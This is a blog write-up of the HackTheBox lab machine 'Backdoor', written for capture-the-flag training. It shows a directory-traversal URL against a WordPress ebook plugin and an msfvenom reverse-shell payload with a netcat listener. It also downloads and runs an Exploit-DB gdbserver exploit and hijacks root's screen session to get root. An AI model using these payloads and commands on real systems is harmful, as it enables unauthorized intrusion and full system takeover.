HackTheBox – Backdoor Write-up

Hi everyone! This write-up is on Backdoor, an easy Linux machine. I wouldn’t say this machine is actually easy. This machine requires us to manually enumerate WordPress’s plugin directory, and exploit the directory traversal vulnerability to leak process. Exploit the gdbserver process to obtain a reverse shell before attaching to the root’s screen session for a root shell. Let’s get started!

1. Nmap enumeration

kali@kali~$ IP=10.10.11.125
kali@kali~$ sudo nmap -sC -sV -p- $IP                                                                                            
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-06 12:26 EDT
Nmap scan report for 10.10.11.125
Host is up (0.074s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Web enumeration

2.1 Plugin discovery

When accessing http://10.10.11.125/wp-content/plugins/, I noticed a directory e-book.

A quick Google allows me to find an exploit for it here which has a Directory Traversal vulnerability that allows us to download any files on the machine.

2.2 Leak processes via Directory Traversal

While Googling for RCE via Directory Traversal, I came across this article that talks about leaking processes via Directory Traversal here. Via leaking of processes, we may find out what is the process running on port 1337.

Visit http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/sched_debug to download the file. Once downloaded, I scroll through the processes and noticed an interesting process, gdbserver.

kali@kali~$ cat sched_debug
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
...
S      gdbserver 96467         9.348917        13   120         0.000000         3.398132         0.000000 0 0 /autogroup-204

Next, we can further query to PID. In your browser, go to http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/96467/cmdline

We will see that gdbserver is indeed running on port 1337.

kali@kali~$ cat cmdline               
../../../../../../../proc/96467/cmdline../../../../../../../proc/96467/cmdline../../../../../../../proc/96467/cmdlinegdbserver--once0.0.0.0:1337/bin/true<script>window.close()</script>

2.3 Exploit gdbserver for initial shell

A quick Google for gdbserver allows me to find this. The steps needed are already shown in the exploit’s comment. Firstly, we need to generate a reverse shell then listen at port 1337 for incoming reverse shell.

kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1337 PrependFork=true -o rev.bin
kali@kali~$ nc -lvnp 1337

Download the exploit and run it.

kali@kali~$ wget https://www.exploit-db.com/raw/50539
kali@kali~$ python3 50539 $IP:1337 rev.bin                                                                 
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Our Netcat should have an initial shell. I spawn a tty shell.

kali@kali~$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.125] 38204
python3 -c 'import pty; pty.spawn("/bin/bash")'
user@Backdoor:/home/user$ 

We can now obtain the flag.

user@Backdoor:/home/user$ cat user.txt
cat user.txt
1bf*****************************

Privilege escalation

Attach to existing screen

Firstly, I looked at the running processes under root and notice that screen is executed with the -S flag which means a new session.

user@Backdoor:/home/user$ ps aux | grep root
...
root         859  0.0  0.0   2608  1752 ?        Ss   16:34   0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

Reading the man page allows me to find out I can attach to it using the “-x” flag. If we try to attach it directly, it will say that the terminal is not set. Therefore, we have to set xterm first before attaching to the screen session. This source also teaches us how to connect to another user’s screen session. Finally, we will have a root shell and allowing us to obtain the flag.

user@Backdoor:/home/user$ TERM=vt100; export TERM
user@Backdoor:/home/user$ screen -x root/root
root@Backdoor:~# 
root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
8b2*****************************
root@Backdoor:~# 

Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.